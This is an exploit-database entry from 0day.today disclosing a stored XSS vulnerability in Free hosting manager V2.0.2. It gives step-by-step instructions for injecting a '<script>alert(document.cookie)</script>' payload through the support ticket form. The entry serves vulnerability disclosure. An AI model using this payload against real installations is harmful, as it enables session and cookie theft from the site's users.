[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Free hosting manager V2.0.2 Stored XSS Vulnerability

Author
i2sec
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-20005
Category
web applications
Date add
19-12-2012
Platform
php
# Exploit Title: Free hosting manager V2.0.2 Stored XSS
# Date: 19/12/2012
# Exploit Author: Lee Chung Eon
# Vendor by:
# Software Link: http://www.fhm-script.com/download.php
# Version: 2.0.2
# Category:Web Security
# Tested on: Windows xp / 7
+--------------------------------------------------------------------------+
 
Stored XSS-vulnerabilities
 
 
0. install
 
1. register complete
 
2. inject following code
 
<script>alert(document.cookie)</script>
 
3. into support --> ticket
 
4. Visit your profile and Can see the execution of injected script
 
------------------------------------------------------------------------------

#  0day.today [2024-12-25]  #